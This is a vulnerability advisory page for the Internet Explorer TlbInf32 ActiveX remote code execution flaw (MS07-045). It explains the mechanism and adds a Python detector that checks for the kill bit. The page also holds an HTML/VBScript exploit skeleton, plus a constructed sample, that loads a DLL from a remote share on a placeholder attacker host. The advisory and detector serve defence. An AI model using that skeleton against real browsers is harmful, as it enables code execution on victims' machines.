Microsoft IE tblinf32.dll ActiveX Control Remote Code Execution Vulnerability (MS07-045)

Vulnerability ID: 1112884
Vulnerability type: Configuration error
Published: 2007-05-08
Updated: 2007-08-30
CVE: CVE-2007-2216
CNNVD ID: CNNVD-200708-221
Platform: Windows
CVSS score: 9.3
| Vulnerability sources
https://www.exploit-db.com/exploits/30490
https://www.securityfocus.com/bid/25289
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-221
| Vulnerability details
Internet Explorer is Microsoft's widely deployed web browser. The tblinf32.dll (also shipped as vstlbinf.dll) ActiveX control used by IE does not implement IObjectSafety correctly, and a remote attacker can use the control to take control of a user's system. TlbInf32.dll is a set of COM objects that lets Visual Basic and C++ programmers read type libraries. The library reports itself as safe:

Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller, data

The TypeLibInfoFromFile() method opens a file and retrieves type library information from it:

TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo

The method accepts a WebDAV or SMB share path to the DLL, so it will retrieve information from a DLL on a remote server. If the DLL passed to TypeLibInfoFromFile() is modified so that its HelpStringDll attribute points to a DLL exporting a malicious DLLGetDocumentation function, that function is executed when the HelpString property is read:

<object classid="CLSID:<CLASSID>" name=test></object>
x = test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)

A user who is tricked into visiting a malicious site can therefore end up executing arbitrary code. An attacker who successfully exploits this vulnerability gains the same rights as the logged-on user; accounts configured with fewer privileges on the system are less affected than accounts with administrative privileges.
| Exploit (EXP)
source: http://www.securityfocus.com/bid/25289/info

The Microsoft Visual Basic 6 TypeLib Information Library (TLI) ActiveX control is prone to a remote code-execution vulnerability.

An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. 

<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
<script language="vbscript">
' <CLASSID>, IPADDRESS and SHARE are placeholders left by the original poster;
' a and b are the indexes of the interface and member whose HelpString is read.
' The ' comment style marks this as VBScript, so the lines are wrapped in a
' vbscript block and Set is used for the object assignment.
Set x = test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Reading HelpString makes the control load the DLL named by HelpStringDll
' and call its exported DLLGetDocumentation function.
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
</script>
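The mechanism in the details above (the TLI control instantiated by CLSID, TypeLibInfoFromFile pointed at a UNC or WebDAV share, DLLGetDocumentation run when HelpString is read) and the exploit skeleton above are the pattern a content filter or incident-response triage script would look for. The following Python is an added example written for this page, not code from the advisory, from Microsoft or from the original poster. It flags HTML that instantiates the CLSID quoted in the details and passes a remote path to TypeLibInfoFromFile, and, when run on Windows, reads IE's kill-bit registry value for that CLSID. The two sample documents, the TEST-NET address 192.0.2.10 and the stdole2.tlb path are constructed for the example; the kill-bit registry location (Compatibility Flags bit 0x400) is standard IE behaviour and is not mentioned on the page itself.

```python
import re
import sys

# CLSID of the TLI (TypeLib Information) control, taken from the IObjectSafety
# report quoted in the advisory. No other CLSIDs are assumed here.
TLI_CLSID = "8B217746-717D-11CE-AB5B-D41203C10000"

# IE refuses to instantiate a control whose "Compatibility Flags" value under
# HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
# has bit 0x400 set (the "kill bit").
KILL_BIT = 0x00000400

# <object classid="CLSID:{...}"> as written on exploit pages; braces and case vary.
_CLASSID_RE = re.compile(
    r'classid\s*=\s*["\']?\s*clsid:\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?',
    re.IGNORECASE,
)
# TypeLibInfoFromFile("<path>") with the first string argument captured.
_TLIFF_RE = re.compile(r'TypeLibInfoFromFile\s*\(\s*["\']([^"\']+)["\']', re.IGNORECASE)


def is_remote_path(path: str) -> bool:
    """True for UNC / WebDAV-style paths (\\\\host\\share\\x.dll or //host/share/x.dll).

    Exploit pages often write the UNC prefix with doubled backslashes, as the
    skeleton above does, so any run of two or more leading backslashes counts."""
    return path.startswith("\\\\") or path.startswith("//")


def scan_html(html: str) -> dict:
    """Static check of one HTML document for the MS07-045 pattern: the TLI control
    instantiated by CLSID and TypeLibInfoFromFile pointed at a remote share."""
    clsids = {m.group(1).upper() for m in _CLASSID_RE.finditer(html)}
    paths = [m.group(1) for m in _TLIFF_RE.finditer(html)]
    remote = [p for p in paths if is_remote_path(p)]
    tli = TLI_CLSID in clsids
    if tli and remote:
        verdict = "exploit-pattern"
    elif tli or paths:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"tli_control": tli, "typelib_paths": paths,
            "remote_typelib_paths": remote, "verdict": verdict}


def kill_bit_set(compat_flags) -> bool:
    """Interpret a Compatibility Flags DWORD; None means the key was absent."""
    return compat_flags is not None and bool(compat_flags & KILL_BIT)


def read_compat_flags(clsid: str = TLI_CLSID):
    """Read IE's Compatibility Flags for clsid from HKLM. Returns None when the
    key or value is absent, or when not running on Windows (no registry)."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only module, imported lazily
    key_path = (r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
                r"\{%s}" % clsid)
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
            value, _type = winreg.QueryValueEx(key, "Compatibility Flags")
            return int(value)
    except OSError:
        return None


# Constructed sample: the skeleton from the advisory with the CLSID filled in and
# a TEST-NET address standing in for IPADDRESS. Not a page observed in the wild.
SAMPLE_EXPLOIT = r"""<object width=1000 height=20
  classid="CLSID:{8B217746-717D-11CE-AB5B-D41203C10000}" name=test></object>
<script language="vbscript">
Set x = test.TypeLibInfoFromFile("\\\\192.0.2.10\\share\\remote.dll")
alert(x.Interfaces.Item(1).Members.Item(1).HelpString)
</script>"""

# Constructed sample: same control, but reading a local type library only.
SAMPLE_LOCAL = r"""<object classid="clsid:8B217746-717D-11CE-AB5B-D41203C10000" name=t></object>
<script language="vbscript">
Set x = t.TypeLibInfoFromFile("C:\Windows\System32\stdole2.tlb")
</script>"""

if __name__ == "__main__":
    for name, doc in (("exploit", SAMPLE_EXPLOIT), ("local", SAMPLE_LOCAL)):
        print(name, scan_html(doc))
    flags = read_compat_flags()
    print("kill bit set for TLI control:", kill_bit_set(flags), "(flags=%r)" % flags)
```

A page that instantiates the control but only reads a local type library is reported as "suspicious" rather than "exploit-pattern": the control is still being scripted from a web page despite its IObjectSafety claims, which is what the kill bit exists to stop, so the host check should be run regardless of the verdict.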
| Affected products
Microsoft Internet Explorer 5.0.1 SP4 - Microsoft Windows 2000 Advanced Server SP4 - Microsoft Windows 2000 Datacenter Server SP4 -
| References

Source: US-CERT
Name: TA07-226A
Link: http://www.us-cert.gov/cas/techalerts/TA07-226A.html
Source: BID
Name: 25289
Link: http://www.securityfocus.com/bid/25289
Source: BUGTRAQ
Name: 20070815 TlbInf32 ActiveX Command Execution
Link: http://www.securityfocus.com/archive/1/archive/1/476742/100/0/threaded
Source: OSVDB
Name: 36396
Link: http://www.osvdb.org/36396
Source: VUPEN
Name: ADV-2007-2869
Link: http://www.frsirt.com/english/advisories/2007/2869
Source: SECTRACK
Name: 1018562
Link: http://securitytracker.com/id?1018562
Source: SECUNIA
Name: 26419
Link: http://secunia.com/advisories/26419
Source: US Government Resource: oval:org.mitre.oval:def:2109
Name: oval:org.mitre.oval:def:2109
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:2109